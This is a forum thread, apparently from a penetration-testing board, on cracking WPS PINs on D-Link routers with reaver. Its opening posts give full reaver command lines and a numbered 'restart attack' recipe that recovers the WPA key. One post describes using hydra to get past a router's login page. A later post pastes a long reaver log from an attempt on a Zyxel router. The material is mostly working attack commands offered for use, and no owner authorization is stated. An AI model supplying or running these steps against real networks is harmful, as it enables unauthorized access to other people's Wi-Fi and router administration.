Results 1 to 9 of 9

Thread: Cracking 6C:19:8F D-Link Router with reaver and defeating the 99.99% problem.

  1. #1
    Join Date
    2013-Jul
    Posts
    841

    Cracking 6C:19:8F D-Link Router with reaver and defeating the 99.99% problem.

    First attempts at cracking this D-Link Router with Reaver seemed to be blocked by the firmware. Note the RSSI was 67 so signal strength was not an issue.We tried;

    reaver -i mon0 -a -f -c 13 -b 6C:19:8F:XX:XX:XX -vv --mac=00:11:22:33:44:55

    The router would provide two(2) or three(3) pins and then freeze for a long period.


    Next we employed the command line:

    reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -S -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55

    Pin harvesting was good but the router ran up to 99:99% and spun at that number requesting pins endlessly. We started a new session and ran it up to 99:99% twice more with the same results.

    After a rethink we focused on the -S dh-small. We removed the -S -a and -f from the command line and ran:

    reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55

    Removing the -a forced reaver to ask if we wanted to restore previous session. We selected n ie NO.

    We got the key in one(1) pass BUT the WPS key was 12345670 according to reaver. This intrigued us so we logged onto the router using the WPA key provided by reaver, got association then hacked past the routers login page with hydra and went straight to the WPS page

    1. The WPS system was active
    2. The WPS mode was Enrollee
    3. No wps pin was seen

    This may mean that:

    1. DLink Routers in the enrolle mode might by hacked by running thru the pins to 99:99% using the dh-small then remove the -S and -a which will force reaver to ask if you want to restore the old session. Say no and run the attack again.

    OR

    2. Just running the command line:

    reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55

    against this router if in enrollee mode will crack the code in one iteration.

    MTC
    Last edited by mmusket33; 2014-08-28 at 01:21.

  2. #2
    Join Date
    2013-Jul
    Posts
    841
    The D-Link 99:99% Restart Attack with Reaver

    Musket Team have successfully cracked a second D-Link router C0:A0:BB:XX:XX:XX thus replicating the procedures previously outlined.

    This router was unresponsive to reaver attacks until we used the following command line:

    reaver -i mon0 -c 1 -b C0:A0:BB:XX:XX:XX -S -E -vv -N -T 1 -t 20 -d 0 -l 420 -x 30 --mac=00:11:22:33:44:55

    Pin harvest was very slow so we used varmacreaversav99.2.sh. The pin count jumped to 91.% but then took 5 days to go to 99.99%. At that point the pin request switched to 1234 and spun endlessly at that number. We let it spin for a few hours then stopped varmacreaversav992.sh and switched to the command line

    We removed the -S i.e. use small -DH keys

    reaver -i mon0 -c 1 -b C0:A0:BB:XX:XX:XX -E -vv -N -T 1 -t 20 -d 0 -l 420 -x 30 --mac=00:11:22:33:44:55

    When the program asked to restore the previous session we said n ie NO start a new attack. Reaver sent the pin request 12345670 and immediately cracked the code

    We call this reaver attack the D-Link 99:99% restart attack

    Here is what we know at present

    For some unresponsive D-Link routers

    1. Use the command line in step one above and slowly harvest pins till you obtain 99:99%

    2. Let the 99:99% spin endlessly for a while.

    3. In both successful attacks the pin requests dropped to four digits or 1234 after a time

    4. Stop the attack.

    5 Remove the -S from the command line

    6. Restart and when asked to restore previous session say n "NO" If the attack works you will get the WPS key almost immediately and the WPS Code will be 12345670

    Varmacreaversav992.sh is not central to the success of this attack. If the program allows faster harvesting of pins use it. If not just use the command line. We always try the commmand line first and move on from there.


    MTeams
    Last edited by mmusket33; 2014-09-15 at 04:05.

  3. #3
    Join Date
    2015-Apr
    Posts
    2
    This worked for me! But I what I want to ask is that if I were to want the password again,which wps pin should I use?,should I try to get the wpa key using pin 12345670?

  4. #4
    Join Date
    2013-Jul
    Posts
    841
    Put the WPS pin in the reaver command line i.e. add --pin=12345670 or whatever pin you found. The owner could change the WPS pin. If this doesnot work start a new reaver session and brute force the WPA key again. You could always try the new pixiedust attack. It only takes a few minutes once you setup the programs. Read the pixie dust threads in these forums

    MTeams

  5. #5
    Join Date
    2015-Mar
    Posts
    127
    Very interesting........ I'll be on the look out for Dlink routers.

    list the models and chipset vulnerable to this please.

    I ran across a dlink that supports wps. but is doesnt have a wps button. wps button is virtual on routers homepage. there was no set pin from factory. wps pin created at the time customer wants to pair a new device. Before i knew this i spent time pixiewps, then bruteforing --- failed
    model dlink 2750B
    Last edited by nuroo; 2015-04-23 at 16:37.

  6. #6
    HI Musket Team. Could You Please Help me ...

    i am using kali Linux 1.1.0 and reaver 1.5 and Bully (Latest Git). the problem is Reaver is not working with most of the Zyxel brand Routers, WPS is enabled. i tried reaver and bully on my Friends Router and i get nothing just " WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null)" and after sometime when it successfully associate then i get EAPOL warning and sometime "WPS transaction Error" . interesting thing is i tried this reaver on three Zyxel routers , Same result and also these all Routers Manufacturing date is 2009-2010 (When WPS flaw is not Gone Public). This problem is only related to Zyxel F4:3E:61:xx:xx:xx Brands. So someone explain me why this not working with these Brands?? And also Help me to resolve this issue . (See the below Output and Link for my bully output and WPS settings Screen Shot)..

    http://i.imgur.com/NngbBZ7.png
    http://i.imgur.com/uSdk9wE.png


    reaver -i mon0 -b F4:3E:61:9C:80:xx -vv
    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    [+] Waiting for beacon from F4:3E:61:9C:80:xx
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [+] Switching mon0 to channel 11
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Associated with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m8s.
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [!] WARNING: 10 failed connections in a row
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m15s.
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    ^C
    [+] Nothing done, nothing to save.

    Thanks in Advance..

  7. #7
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Look in the beacon frames in wireshark to see if WPS is even configured. The GUI and the beacons tell a different story.

  8. #8
    Quote Originally Posted by soxrok2212 View Post
    Look in the beacon frames in wireshark to see if WPS is even configured. The GUI and the beacons tell a different story.
    Here is the Wireshark Output . Please See this....

    http://www.fileconvoy.com/dfl.php?id...c452c189a6e471

  9. #9
    Join Date
    2015-Apr
    Posts
    2
    Thank you for your reply,pixie dust does look very interesting and I will give it a try.

Similar Threads

  1. WPS Cracking with Reaver issue
    By machx in forum General Archive
    Replies: 5
    Last Post: 2015-06-24, 22:38

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •